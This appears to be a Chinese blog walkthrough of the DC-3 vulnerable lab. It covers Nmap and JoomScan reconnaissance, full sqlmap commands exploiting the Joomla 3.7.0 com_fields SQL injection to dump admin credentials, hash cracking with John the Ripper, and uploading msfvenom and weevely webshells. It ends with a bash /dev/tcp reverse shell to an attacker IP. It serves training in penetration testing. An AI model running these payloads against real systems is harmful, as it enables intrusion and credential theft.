首页 > 其他分享 >DC系列靶场---DC 3靶场的渗透测试(一)

DC系列靶场---DC 3靶场的渗透测试(一)

时间:2024-07-25 21:29:22浏览次数:7  
标签:-- fields list DC --- Joomla SQL 靶场 php

信息收集

Nmap扫描

nmap -sS -sV -T4 -p- -O 172.30.1.142

//-sS  TCP的SYN扫描
//-sV  服务版本检测
//-T4  野蛮的扫描(常用)
//-O   识别操作系统

使用Nmap扫描只看到一个80端口,Apache的2.4.18版本。

http探测

使用Wappalyzer插件可以到这是Joomla的CMS。Joomla!是一套全球知名的内容管理系统(CMS)Joomla的架构基于MVC框架。

JoomScan

介绍一款专门针对Joomla的开源工具JoomScan

JoomScan是一个开源的漏洞扫描器,‌主要用于自动化检测Joomla CMS的安全漏洞,‌以增强Joomla CMS开发的安全性。‌

用法很简单 joomscan 选项 我们可以直接joomscan -u 目标主机

joomscan -u 172.30.1.142

通过扫描我们看到这是Joomla 3.7.0的版本,找到了一个网站管理后台。

漏洞探测及利用

我们可以看看这个Joomla 3.7.0有没有公开漏洞

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

第三个就是Joomla 3.7.0b版本SQL注入的漏洞

SQL注入

什么是SQL注入呢?

SQL注入漏洞:

SQL注入攻击指的是通过构建特殊的SQL输入语句,传入Web应用程序,而这些输入大都是SQL语法里的一些组合,

通过执行SQL语句而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

我们可以进去看看这个漏洞

这里直接是可以看到sqlmap的执行语句,我们可以直接复制,改为目标主机的IP地址就可以。

sqlmap -u "http://172.30.1.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

我们看到这个数据库中有个joomladb的数据库

sqlmap -u "http://172.30.1.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

我们应该关注users这个表中的数据

sqlmap -u "http://172.30.1.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users'  --columns -p list[fullordering]

现在我们看到了中的字段,我们再对字段中的数据进行查询

sqlmap -u "http://172.30.1.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C username,password --dump -p list[fullordering]

我们现在看到了后台管理员用户名还有一段加密的密码。

看一下这段密文是什么加密算法

hashid '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'

解密

John the Ripper是一款开源密码安全审计和密码恢复工具,可用于许多操作系统。

我们使用款开工具进行解密,操作方法。

echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > pass.txt

john passwd.txt

先把我们的密文写入一个txt文件中,直接使用john进行破解。

我们已经得到了管理员的后台登录地址,也拿到了用户名和密码。

管理后台:http://172.30.1.142/administrator/

用户名和密码:admin:snoopy

成功登录到后台,这时候的思路就是通过木马上传拿到shell

木马上传

创建木马

方法1:msfvenom

msfvenom -p php/meterpreter/reverse_tcp lhost-192.168.195.77 lport=4444 -f raw -o webshell3.php

在模板里新建PHP文件类型,文件名为webshell3

msf> use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 172.30.1.142

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

访问一下我们上传的木马路径

http://192.168.195.138/templates/beez3/webshell3.php

这样我们就成功拿到shell

方法2:weevely

root@kali3:~# weevely generate xiaofeixia webshell.php

generate            Generate new agent  生成一个代理(木马程序)

weevely http://192.168.195.138/templates/beez3/webshell.php xiaofeixia

成功连上拿到shell

Kali端运行:

nc -lvp 2266 

weevely用户端 bash -c 'bash -i >& /dev/tcp/192.168.195.77/2266 0>&1'  //获得一个交互式shell

标签:--,fields,list,DC,---,Joomla,SQL,靶场,php
From: https://blog.csdn.net/zhouA0221/article/details/140666012

相关文章

  • CM311-1A魔百和刷armbian或openwrt系统包
    系统包下载链接:Openwrt:阿里云盘链接:https://www.aliyundrive.com/s/tEemRbs1TYB已失效下载后请解压!!!!!!!!!Armbian:链接:https://www.aliyundrive.com/s/N393cE6Zhhv已失效下载后请解压!!!!!!!!!U盘系统烧录工具链接:https://pan.baidu.com/s/1T7EPQP-6ca_-tHTu_IO6ow?pwd=twnb阿里云盘:https://w......
  • Harmony鸿蒙实战开发-记事本「登录保护」【源码在文末】
    Harmony鸿蒙实战开发-记事本「登录保护」【源码在文末】文章目录Harmony鸿蒙实战开发-记事本「登录保护」【源码在文末】一、运行演示1、注册2、登录3、主页4、编写二、部分代码三、源码运行工具:DevEcoStudio一、运行演示1、注册2、登录3、主页4、编写......
  • sqli-labs(6-10)关通过讲解
    sqli-labs(6-10)关通过讲解Less-6方法一:手工注入1.判断闭合http://localhost/sqli-labs/Less-6/?id=1"//报错http://localhost/sqli-labs/Less-6/?id=1"--+//正常http://localhost/sqli-labs/Less-6/?id=1"and1=1--+http://localhost/sqli-labs/Less-6/?id=1"......
  • 基于De-Jitter Buffer算法的无线网络业务调度matlab仿真,对比RR调度算法
    1.程序功能描述     去抖动缓冲器(动态缓冲技术)通常在用户终端的流式播放器处采用,以最小化分组延迟对用户体验的降级。然而,由于无线电信道的波动,在无线分组网络中,为流用户提供服务质量(QoS)仍然是一项具有挑战性的任务。在这个项目中,我们将提出一种去抖动缓冲区感知调度器,......
  • sql-DQL基础语句总结
    一·基础查询1.语法SELECT*|{[DISTINCT]column|expression[alias],...}FROMtable;select查询列表from表名;注意:(1)SELECT:标识选择哪些列(2)FROM:标识从哪个表中选择2、特点(1)查询列表可以是:表中的字段、常量值、表达式、函数。(2)查询的结果是一个虚拟的表格。二·......
  • netty入门-3 EventLoop和EventLoopGroup,简单的服务器实现
    文章目录EventLoop和EventLoopGroup服务器与客户端基本使用增加非NIO工人NioEventLoop处理普通任务与定时任务结语EventLoop和EventLoopGroup二者大概是什么这里不再赘述,前一篇已简述过。不理解也没关系。下面会简单使用,看了就能明白是什么这篇文章只说NioEvent......
  • java包装类型缓存简单探究-Integer为例
    文章目录包装类型缓存自动装箱与valueOf感悟结语包装类型缓存包装类型缓存是什么本文以常用的Integer包装类为例做一个探索,感兴趣可以用类似方法查看其他包装类。我们都知道它会缓存-128到127之间的整数Integer对象。结论大伙都知道。那么我们今天就来探究一下底......
  • C++ - 目录 - 一周速通
    基础入门免费教程希望可以帮助每一位编程爱好者!开源地址:点我加入开发工具随课习题文章目录C++基础-0-了解历史C++基础-1-开始入门C++基础-2-数据类型C++基础-3-变量常量C++基础-4-运算符号C++基础-5-条件判断C++基础-6......
  • 【题解】Solution Set - 杂题选讲「刘君实」
    https://www.becoder.com.cn/contest/5423「HNOI2012」集合选数感觉差不多会。7/25sh杂题听课情况NOI2018冒泡排序【40】几乎不会麦田里的守望者【40】打表找规律、最后dp不太理解星空列车【40】完全不会WereYouLast:知道怎么做,但是不知道为什么是对的A......
  • 财务知识-简述对赌协议
    财务知识-简述对赌协议......